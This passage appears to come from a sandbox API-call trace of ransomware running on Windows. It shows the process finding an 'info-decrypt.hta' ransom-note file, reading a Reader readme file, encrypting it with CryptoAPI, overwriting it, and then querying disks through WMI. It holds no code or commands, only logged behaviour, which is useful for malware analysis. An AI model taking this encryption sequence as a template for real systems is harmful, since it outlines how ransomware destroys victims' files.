(x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0189.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0189.060] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0189.060] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0189.060] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm", lpFilePart=0x0) returned 0x35 [0189.060] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0189.060] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecs.htm"), fInfoLevelId=0x0, lpFileInformation=0x37afad8 | out: lpFileInformation=0x37afad8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3f71)) returned 1 [0189.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0189.061] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm", lpFilePart=0x0) returned 0x35 [0189.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0189.061] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecs.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0189.061] GetFileType (hFile=0x598) returned 0x1 [0189.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee24) returned 1 [0189.061] GetFileType (hFile=0x598) returned 0x1 [0189.061] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x8f6ef30 | out: lpFileSizeHigh=0x8f6ef30*=0x0) returned 0x3f71 [0189.062] ReadFile (in: hFile=0x598, lpBuffer=0x37afca8, nNumberOfBytesToRead=0x3f71, lpNumberOfBytesRead=0x8f6eedc, lpOverlapped=0x0 | out: lpBuffer=0x37afca8*, lpNumberOfBytesRead=0x8f6eedc*=0x3f71, lpOverlapped=0x0) returned 1 [0189.063] CloseHandle (hObject=0x598) returned 1 [0189.063] CryptAcquireContextW (in: phProv=0x8f6ee7c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ee7c*=0x66bb0d0) returned 1 [0189.064] CryptGenRandom (in: hProv=0x66bb0d0, dwLen=0x10, pbBuffer=0x37b3f70 | out: pbBuffer=0x37b3f70) returned 1 [0193.772] CryptImportKey (in: hProv=0x66bb0d0, pbData=0x37fb7b0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x8f6ee4c | out: phKey=0x8f6ee4c*=0xb7f890) returned 1 [0193.772] CryptContextAddRef (hProv=0x66bb0d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0193.772] CryptContextAddRef (hProv=0x66bb0d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0193.772] CryptDuplicateKey (in: hKey=0xb7f890, pdwReserved=0x0, dwFlags=0x0, phKey=0x8f6ee3c | out: phKey=0x8f6ee3c*=0xb7fa50) returned 1 [0193.772] CryptContextAddRef (hProv=0x66bb0d0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0193.772] CryptSetKeyParam (hKey=0xb7fa50, dwParam=0x4, pbData=0x37fb890*=0x1, dwFlags=0x0) returned 1 [0193.772] CryptSetKeyParam (hKey=0xb7fa50, dwParam=0x1, pbData=0x37fb85c, dwFlags=0x0) returned 1 [0193.772] CryptEncrypt (in: hKey=0xb7fa50, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x37fb8a0*, pdwDataLen=0x8f6eea8*=0x3f80, dwBufLen=0x3f80 | out: pbData=0x37fb8a0*, pdwDataLen=0x8f6eea8*=0x3f80) returned 1 [0193.773] CryptEncrypt (in: hKey=0xb7fa50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37ff844*, pdwDataLen=0x8f6eeb0*=0x0, dwBufLen=0x10 | out: pbData=0x37ff844*, pdwDataLen=0x8f6eeb0*=0x10) returned 1 [0193.774] CryptDestroyKey (hKey=0xb7f890) returned 1 [0193.774] CryptReleaseContext (hProv=0x66bb0d0, dwFlags=0x0) returned 1 [0193.774] CryptReleaseContext (hProv=0x66bb0d0, dwFlags=0x0) returned 1 [0193.774] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm", nBufferLength=0x105, lpBuffer=0x8f6e920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm", lpFilePart=0x0) returned 0x35 [0193.775] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee14) returned 1 [0193.775] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeCS.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmecs.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0193.775] GetFileType (hFile=0x4e0) returned 0x1 [0193.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee10) returned 1 [0193.775] GetFileType (hFile=0x4e0) returned 0x1 [0193.775] WriteFile (in: hFile=0x4e0, lpBuffer=0x37ffe48*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x8f6eea4, lpOverlapped=0x0 | out: lpBuffer=0x37ffe48*, lpNumberOfBytesWritten=0x8f6eea4*=0x20, lpOverlapped=0x0) returned 1 [0193.776] CloseHandle (hObject=0x4e0) returned 1 [0193.777] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0193.777] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0193.777] CoTaskMemFree (pv=0xbed438) [0193.777] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x8f6e908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0193.777] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ee50 | out: ppv=0x8f6ee50*=0xb51e34) returned 0x0 [0193.777] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ee48 | out: pAptType=0x8f6ee48*=1) returned 0x0 [0193.777] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ee4c | out: ppvObject=0x8f6ee4c*=0x0) returned 0x80004002 [0193.777] IUnknown:Release (This=0xb51e34) returned 0x1 [0193.778] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e7b8 | out: ppv=0x8f6e7b8*=0x6027720) returned 0x0 [0193.778] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027720, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e9d0 | out: ppvObject=0x8f6e9d0*=0x0) returned 0x80004002 [0193.778] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027720, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e9e4 | out: ppvObject=0x8f6e9e4*=0x6030c50) returned 0x0 [0193.779] WbemDefPath:IUnknown:Release (This=0x6027720) returned 0x0 [0193.779] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e604 | out: ppvObject=0x8f6e604*=0x6030c50) returned 0x0 [0193.779] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e5c0 | out: ppvObject=0x8f6e5c0*=0x0) returned 0x80004002 [0193.779] WbemDefPath:IUnknown:AddRef (This=0x6030c50) returned 0x3 [0193.779] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6df1c | out: ppvObject=0x8f6df1c*=0x0) returned 0x80004002 [0193.779] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6decc | out: ppvObject=0x8f6decc*=0x0) returned 0x80004002 [0193.779] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ded8 | out: ppvObject=0x8f6ded8*=0xbdf140) returned 0x0 [0193.779] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf140, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6dee0 | out: pCid=0x8f6dee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0193.779] WbemDefPath:IUnknown:Release (This=0xbdf140) returned 0x3 [0193.779] CoGetContextToken (in: pToken=0x8f6df38 | out: pToken=0x8f6df38) returned 0x0 [0193.779] CoGetContextToken (in: pToken=0x8f6e340 | out: pToken=0x8f6e340) returned 0x0 [0193.779] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e3d0 | out: ppvObject=0x8f6e3d0*=0x0) returned 0x80004002 [0193.779] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x2 [0193.779] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x1 [0193.779] CoGetContextToken (in: pToken=0x8f6ecc8 | out: pToken=0x8f6ecc8) returned 0x0 [0193.779] CoGetContextToken (in: pToken=0x8f6ec28 | out: pToken=0x8f6ec28) returned 0x0 [0193.780] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030c50, riid=0x8f6ecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ecf4 | out: ppvObject=0x8f6ecf4*=0x6030c50) returned 0x0 [0193.780] WbemDefPath:IUnknown:AddRef (This=0x6030c50) returned 0x3 [0193.780] WbemDefPath:IUnknown:Release (This=0x6030c50) returned 0x2 [0193.780] WbemDefPath:IWbemPath:SetText (This=0x6030c50, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.780] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030c50, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0193.780] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee78*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee78*=0x20, pszText=0x0) returned 0x0 [0193.780] WbemDefPath:IWbemPath:GetText (in: This=0x6030c50, lFlags=2, puBuffLength=0x8f6ee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0193.780] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030c50, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0193.780] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030c50, puCount=0x8f6ee7c | out: puCount=0x8f6ee7c*=0x0) returned 0x0 [0193.780] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030c50, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0193.780] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030c50, uRequestedInfo=0x0, puResponse=0x8f6ee84 | out: puResponse=0x8f6ee84*=0xc19) returned 0x0 [0193.780] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030c50, puCount=0x8f6edfc | out: puCount=0x8f6edfc*=0x0) returned 0x0 [0193.780] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x8f6ede8 | out: puCount=0x8f6ede8*=0x2) returned 0x0 [0193.780] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ede4*=0xf, pszText=0x0) returned 0x0 [0193.780] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x8f6ede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0193.780] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6ed98 | out: ppv=0x8f6ed98*=0xb51e34) returned 0x0 [0193.780] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6ed90 | out: pAptType=0x8f6ed90*=1) returned 0x0 [0193.780] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6ed94 | out: ppvObject=0x8f6ed94*=0x0) returned 0x80004002 [0193.780] IUnknown:Release (This=0xb51e34) returned 0x1 [0193.781] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e700 | out: ppv=0x8f6e700*=0x6027710) returned 0x0 [0193.781] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027710, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e918 | out: ppvObject=0x8f6e918*=0x0) returned 0x80004002 [0193.781] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027710, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e92c | out: ppvObject=0x8f6e92c*=0x6030be0) returned 0x0 [0193.781] WbemDefPath:IUnknown:Release (This=0x6027710) returned 0x0 [0193.781] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6030be0) returned 0x0 [0193.782] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0193.782] WbemDefPath:IUnknown:AddRef (This=0x6030be0) returned 0x3 [0193.782] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0193.782] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0193.782] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0xbdf020) returned 0x0 [0193.782] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbdf020, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0193.782] WbemDefPath:IUnknown:Release (This=0xbdf020) returned 0x3 [0193.782] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0193.782] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0193.782] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0193.782] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x2 [0193.782] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x1 [0193.782] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0193.782] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0193.782] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030be0, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6030be0) returned 0x0 [0193.782] WbemDefPath:IUnknown:AddRef (This=0x6030be0) returned 0x3 [0193.782] WbemDefPath:IUnknown:Release (This=0x6030be0) returned 0x2 [0193.782] WbemDefPath:IWbemPath:SetText (This=0x6030be0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0193.783] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030be0, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0193.783] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0193.783] WbemDefPath:IWbemPath:GetText (in: This=0x6030be0, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0193.783] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0193.783] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0193.783] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0193.783] IUnknown:Release (This=0xb51e34) returned 0x1 [0193.784] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6023c90) returned 0x0 [0193.784] WbemLocator:IUnknown:QueryInterface (in: This=0x6023c90, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0193.784] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023c90, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x60276e0) returned 0x0 [0193.784] WbemLocator:IUnknown:Release (This=0x6023c90) returned 0x0 [0193.784] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x60276e0) returned 0x0 [0193.784] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0193.784] WbemLocator:IUnknown:AddRef (This=0x60276e0) returned 0x3 [0193.784] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0193.784] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0193.784] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0193.784] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0193.784] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0193.784] WbemLocator:IUnknown:QueryInterface (in: This=0x60276e0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0193.784] 